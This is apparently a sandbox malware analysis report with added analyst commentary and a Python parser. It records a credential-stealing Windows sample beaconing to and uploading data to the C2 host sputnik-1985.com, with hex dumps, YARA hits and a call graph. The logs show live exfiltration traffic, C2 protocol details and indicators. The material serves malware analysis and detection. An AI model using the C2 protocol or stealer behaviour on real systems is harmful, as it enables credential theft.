User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12105
Host: sputnik-1985.com
2025-01-10 10:36:15 UTC | 12105 | OUT | Data Ascii:
  --9PRQ9RE77OAYR9AA
  Content-Disposition: form-data; name="hwid"

  C144BB41BBB5F67BBC510B35BBB55F9A
  --9PRQ9RE77OAYR9AA
  Content-Disposition: form-data; name="pid"

  2
  --9PRQ9RE77OAYR9AA
  Content-Disposition: form-data; name="lid"

  HpOoIh--2a727a032c4
2025-01-10 10:36:15 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:36:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=66080beu9nsrm7dm08kfbfevun; expires=Tue, 06 May 2025 04:22:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fe5LSkRJkz8RRb0VNBJPW8yXefnzTlQDqGZWyYMAh0S45iEX6wetc78rnqS3%2BPHikbR4jDnbWKvWkFZRs2JbDhWVGWICzlY%2F1u3CF%2BU7NEdpohu%2F1LLxE%2BflG750PGhd6bmG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc066419238c15-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1865&min_rtt=1830&rtt_var=712&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13043&delivery_rate=1595628&cwnd=238&unsent_bytes=0&cid=c0c9deff4ad2292e&ts=466&x=0"
2025-01-10 10:36:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-10 10:36:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.3 | 49788       | 104.21.48.1    | 443              | 7512 | C:\Users\user\Desktop\filename.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-10 10:36:16 UTC | 281               | OUT       | POST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=QYFZCQ13SE3ZZXLYU
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 20457
                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-10 10:36:16 UTC | 15331 | OUT | Data Raw: 2d 2d 51 59 46 5a 43 51 31 33 53 45 33 5a 5a 58 4c 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 51 59 46 5a 43 51 31 33 53 45 33 5a 5a 58 4c 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 59 46 5a 43 51 31 33 53 45 33 5a 5a 58 4c 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
Data Ascii:
--QYFZCQ13SE3ZZXLYU
Content-Disposition: form-data; name="hwid"

C144BB41BBB5F67BBC510B35BBB55F9A
--QYFZCQ13SE3ZZXLYU
Content-Disposition: form-data; name="pid"

3
--QYFZCQ13SE3ZZXLYU
Content-Disposition: form-data; name="lid"

HpOoIh--2a727a03
                                                                                                                                                                                                            2025-01-10 10:36:16 UTC5126OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8a 82 b9 75 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 dd 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 2b 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 75 47 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 ae 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 1d 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: `u?sQ0u+4uG([:s~
2025-01-10 10:36:17 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:17 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=0sof70c44i4q8sninnkbt7bngm; expires=Tue, 06 May 2025 04:22:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c8G1thiQPY1LPY2M3ImB7W69LLkU6IXv2ThRr7I8ZQSPaQwMYO%2BPweBueIR8S9H3lEySF3PHvrIrTQdfQEyRJMvszbsFVgwZjS4HAvoXS7nqUHAA3UQhTYUm27IG6pbCRzyj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc066b5e4043be-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1552&rtt_var=593&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21418&delivery_rate=1829573&cwnd=226&unsent_bytes=0&cid=cee58174dbcaf93f&ts=661&x=0"
2025-01-10 10:36:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-10 10:36:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.3 | 49799       | 104.21.48.1    | 443              | 7512 | C:\Users\user\Desktop\filename.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-10 10:36:17 UTC | 277               | OUT       | POST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=U797ZPLIWVP6J6
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1213
                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-10 10:36:17 UTC | 1213 | OUT | Data Raw: 2d 2d 55 37 39 37 5a 50 4c 49 57 56 50 36 4a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 55 37 39 37 5a 50 4c 49 57 56 50 36 4a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 37 39 37 5a 50 4c 49 57 56 50 36 4a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 55
Data Ascii:
--U797ZPLIWVP6J6
Content-Disposition: form-data; name="hwid"

C144BB41BBB5F67BBC510B35BBB55F9A
--U797ZPLIWVP6J6
Content-Disposition: form-data; name="pid"

1
--U797ZPLIWVP6J6
Content-Disposition: form-data; name="lid"

HpOoIh--2a727a032c4d
--U
2025-01-10 10:36:18 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:18 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=o53juf4i1tff7lpt33nfql9dh6; expires=Tue, 06 May 2025 04:22:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrCGI8gi6OiGUcZNThX6wYr1QXIHXnUwPKKfz2s45SZ579H%2FNCExJ%2BpPp5db8CtNfq7DffJ0JIzbArUMCwosEh4XZ6Xm2NY7ccmaZOc7QXaAxqEe%2BRV%2B7leHADo9NDy8p0mC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc0673cced43be-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1582&rtt_var=593&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2126&delivery_rate=1845764&cwnd=226&unsent_bytes=0&cid=a80a9fd14569a4c9&ts=434&x=0"
2025-01-10 10:36:18 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-10 10:36:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
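The sessions above all follow one pattern: a POST to /api on sputnik-1985.com with a Chrome 119 User-Agent, a multipart/form-data body whose first three parts are hwid (constant across sessions, C144BB41BBB5F67BBC510B35BBB55F9A), pid (2, 3, 1 and 1 in the sessions shown) and lid (constant, HpOoIh--2a727a032c4d), and a Cloudflare-fronted chunked reply of "ok 8.46.123.189". The lid value is what public LummaC2 reporting generally describes as the build or affiliate identifier, so it is the field to pivot on across samples; the hwid ties every session from one host together. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it takes the report's own Data Raw hex listing for session 6, decodes it, parses the multipart body while tolerating the point where the report cuts the listing off, reassembles the chunked reply and returns the identifiers. The function names and the "ok <address>" heuristic are the example's own assumptions, not something the report states; the report also does not say whose address 8.46.123.189 is.

```python
import re

# Session 6 request body, copied from the report's "Data Raw" listing. The
# report truncates the listing after the lid part, mid-way through the next
# delimiter ("--U"), so the parser has to cope with a cut-off final part.
REQUEST_DATA_RAW = (
    "2d 2d 55 37 39 37 5a 50 4c 49 57 56 50 36 4a 36 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a "
    "2d 2d 55 37 39 37 5a 50 4c 49 57 56 50 36 4a 36 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a "
    "31 0d 0a "
    "2d 2d 55 37 39 37 5a 50 4c 49 57 56 50 36 4a 36 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a "
    "48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a "
    "2d 2d 55"
)
# The two inbound chunks of the session 6 reply, also from the report.
RESPONSE_DATA_RAW = (
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a "
    "30 0d 0a 0d 0a"
)
# Session 6 Content-Type header value, as listed in the report.
REQUEST_CONTENT_TYPE = "multipart/form-data; boundary=U797ZPLIWVP6J6"


def decode_data_raw(listing: str) -> bytes:
    """Turn a sandbox 'Data Raw' hex listing ('2d 2d 55 ...') into wire bytes."""
    return bytes.fromhex("".join(listing.split()))


def boundary_from_content_type(content_type: str) -> str:
    """Pull the multipart boundary token out of a Content-Type header value."""
    match = re.search(r'boundary="?([^";\s]+)"?', content_type)
    if not match:
        raise ValueError("no multipart boundary in Content-Type")
    return match.group(1)


def parse_multipart(body: bytes, boundary: str) -> dict[str, bytes]:
    """Map form-data part names to their raw values.

    Splits on the dash-boundary delimiter, reads each part's headers up to the
    blank line, and drops the CRLF that precedes the next delimiter. If the
    listing was truncated, a trailing fragment of the next delimiter (here the
    bare '--U') is recognised as a prefix of the real delimiter and removed.
    """
    delimiter = b"--" + boundary.encode("ascii")
    fields: dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):        # closing delimiter: boundary followed by "--"
            break
        if b"\r\n\r\n" not in part:       # headers themselves cut off: nothing usable
            continue
        headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', headers)
        if name is None:
            continue
        cut = value.rfind(b"\r\n")
        tail = value[cut + 2:] if cut != -1 else b""
        if tail and delimiter.startswith(tail):   # partial next delimiter left by truncation
            value = value[:cut]
        fields[name.group(1).decode("ascii")] = value.removesuffix(b"\r\n")
    return fields


def parse_chunked(raw: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body (hex size line, data, CRLF)."""
    out = bytearray()
    pos = 0
    while True:
        line_end = raw.index(b"\r\n", pos)
        size = int(raw[pos:line_end].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return bytes(out)
        start = line_end + 2
        out += raw[start:start + size]
        pos = start + size + 2                               # skip the chunk's own CRLF


def triage_beacon(content_type: str, body: bytes, reply: bytes) -> dict[str, str]:
    """Extract the C2 identifiers and the server's answer from one exchange."""
    fields = parse_multipart(body, boundary_from_content_type(content_type))
    answer = parse_chunked(reply).decode("ascii", "replace")
    summary = {name: fields[name].decode("ascii", "replace")
               for name in ("hwid", "pid", "lid") if name in fields}
    summary["reply"] = answer
    # Heuristic (an assumption of this example): every session in the report
    # gets back "ok <dotted quad>"; pull the address out so it can be pivoted on.
    ok = re.fullmatch(r"ok (\d{1,3}(?:\.\d{1,3}){3})", answer)
    summary["reported_ip"] = ok.group(1) if ok else ""
    return summary


if __name__ == "__main__":
    body = decode_data_raw(REQUEST_DATA_RAW)
    reply = decode_data_raw(RESPONSE_DATA_RAW)
    for key, val in triage_beacon(REQUEST_CONTENT_TYPE, body, reply).items():
        print(f"{key:12s} {val}")
```

Running it against the session 6 bytes yields hwid C144BB41BBB5F67BBC510B35BBB55F9A, pid 1, lid HpOoIh--2a727a032c4d and the reply "ok 8.46.123.189". The same two functions applied to sessions 5 and 7 give pid 3 and 1 with identical hwid and lid, which is the basis for grouping these requests as one host talking to one build. The truncation handling matters in practice: sandbox reports cut Data Raw after a fixed number of bytes, and without it the lid value would come back with the stray "--U" attached.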


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.3 | 49805       | 104.21.48.1    | 443              | 7512 | C:\Users\user\Desktop\filename.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-10 10:36:18 UTC | 271               | OUT       | POST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1NNI7LSH
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1052
                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-10 10:36:18 UTC | 1052 | OUT | Data Raw: 2d 2d 31 4e 4e 49 37 4c 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 31 4e 4e 49 37 4c 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 4e 4e 49 37 4c 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 31 4e 4e 49 37 4c 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44
Data Ascii:
--1NNI7LSH
Content-Disposition: form-data; name="hwid"

C144BB41BBB5F67BBC510B35BBB55F9A
--1NNI7LSH
Content-Disposition: form-data; name="pid"

1
--1NNI7LSH
Content-Disposition: form-data; name="lid"

HpOoIh--2a727a032c4d
--1NNI7LSH
Content-D
2025-01-10 10:36:19 UTC | 1118 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:19 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=cneifbbud24f55b6ks5rjc7unn; expires=Tue, 06 May 2025 04:22:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=87P4WNPu6juIQszk5mcUj2c8EjaR0P3dFTIXC8Do4brbyYAV8ZkrgNF7rskkbD53ut9GRO8nBQsNHOzc165E8qjld292zuP9%2FyzuK71jy0Xaewmh2hG6DBqYf2m57l6i4we0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc067a5baac461-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1635&rtt_var=627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1959&delivery_rate=1725768&cwnd=228&unsent_bytes=0&cid=c4cd94097a435301&ts=495&x=0"
                                                                                                                                                                                                            2025-01-10 10:36:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.3  49811        104.21.48.14    443               7512  C:\Users\user\Desktop\filename.exe

Timestamp                Bytes  Dir  Data
2025-01-10 10:36:19 UTC  265    OUT  POST /api HTTP/1.1
                                     Connection: Keep-Alive
                                     Content-Type: application/x-www-form-urlencoded
                                     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                     Content-Length: 121
                                     Host: sputnik-1985.com
2025-01-10 10:36:19 UTC  121    OUT  Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41
                                     Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=C144BB41BBB5F67BBC510B35BBB55F9A
2025-01-10 10:36:20 UTC  1120   IN   HTTP/1.1 200 OK
                                     Date: Fri, 10 Jan 2025 10:36:20 GMT
                                     Content-Type: text/html; charset=UTF-8
                                     Transfer-Encoding: chunked
                                     Connection: close
                                     Set-Cookie: PHPSESSID=gfngblmvdds2fjgijkp1f0405i; expires=Tue, 06 May 2025 04:22:59 GMT; Max-Age=9999999; path=/
                                     Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                     Cache-Control: no-store, no-cache, must-revalidate
                                     Pragma: no-cache
                                     X-Frame-Options: DENY
                                     X-Content-Type-Options: nosniff
                                     X-XSS-Protection: 1; mode=block
                                     cf-cache-status: DYNAMIC
                                     vary: accept-encoding
                                     Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Obr3EscvfzycGEYY16IkGg6oc7LVWBJDTnfnIksrO%2BIOf8q1i5ukr0ObfJ6%2BW2ptxRUzXfRK4012Urlw2u6enk43yBUkg39LG1G2a6Yl63in8DD05Jao1Rrgr9VAwyv6xwmr"}],"group":"cf-nel","max_age":604800}
                                     NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                     Server: cloudflare
                                     CF-RAY: 8ffc06808891c461-EWR
                                     alt-svc: h3=":443"; ma=86400
                                     server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1635&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1022&delivery_rate=1754807&cwnd=228&unsent_bytes=0&cid=6076989a994f96af&ts=483&x=0"
2025-01-10 10:36:20 UTC  54     IN   Data Raw: 33 30 0d 0a 61 6c 53 48 78 46 4e 7a 5a 42 6a 34 43 44 31 52 5a 30 73 76 35 72 66 44 4a 4e 50 4b 64 6e 73 56 6a 79 4f 48 46 67 51 65 45 38 38 78 43 51 3d 3d 0d 0a
                                     Data Ascii: 30alSHxFNzZBj4CD1RZ0sv5rfDJNPKdnsVjyOHFgQeE88xCQ==
2025-01-10 10:36:20 UTC  5      IN   Data Raw: 30 0d 0a 0d 0a
                                     Data Ascii: 0



Target ID: 0
Start time: 05:36:05
Start date: 10/01/2025
Path: C:\Users\user\Desktop\filename.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\filename.exe"
Imagebase: 0x400000
File size: 392'192 bytes
MD5 hash: B826127052F19E148F3A0CBE6F33B59C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 05:36:19
Start date: 10/01/2025
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 1856
Imagebase: 0xfe0000
File size: 489'328 bytes
MD5 hash: F5210A4A7E411A1BAD3844586A74B574
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Execution Graph

Execution Coverage: 5%
Dynamic/Decrypted Code Coverage: 8.9%
Signature Coverage: 69.8%
Total number of Nodes: 315
Total number of Limit Nodes: 30
                                                                                                                                                                                                              execution_graph 26651 43d443 26652 43d460 26651->26652 26652->26652 26653 43d49e 26652->26653 26655 43cce0 LdrInitializeThunk 26652->26655 26655->26653 26656 431742 CoSetProxyBlanket 26956 43f780 26957 43f78f 26956->26957 26960 43f90e 26957->26960 26964 43cce0 LdrInitializeThunk 26957->26964 26958 43fb27 26960->26958 26962 43fa6e 26960->26962 26965 43cce0 LdrInitializeThunk 26960->26965 26961 43b160 RtlFreeHeap 26961->26958 26962->26961 26964->26960 26965->26962 26966 40ca84 CoInitializeSecurity 26657 42a54a 26658 42a630 26657->26658 26661 4375f0 26658->26661 26662 437615 26661->26662 26665 437734 26662->26665 26670 43cce0 LdrInitializeThunk 26662->26670 26663 42a649 26665->26663 26667 43788a 26665->26667 26669 43cce0 LdrInitializeThunk 26665->26669 26667->26663 26671 43cce0 LdrInitializeThunk 26667->26671 26669->26665 26670->26662 26671->26667 26672 43d1cb 26673 43d1d5 26672->26673 26674 43d2ae 26673->26674 26678 43cce0 LdrInitializeThunk 26673->26678 26677 43cce0 LdrInitializeThunk 26674->26677 26677->26674 26678->26674 26679 4198ca 26681 4198d0 26679->26681 26680 419a6f CryptUnprotectData 26682 419a99 26680->26682 26681->26680 26683 40e2ce 26684 40e330 26683->26684 26687 40e3be 26684->26687 26690 43cce0 LdrInitializeThunk 26684->26690 26685 40e4de 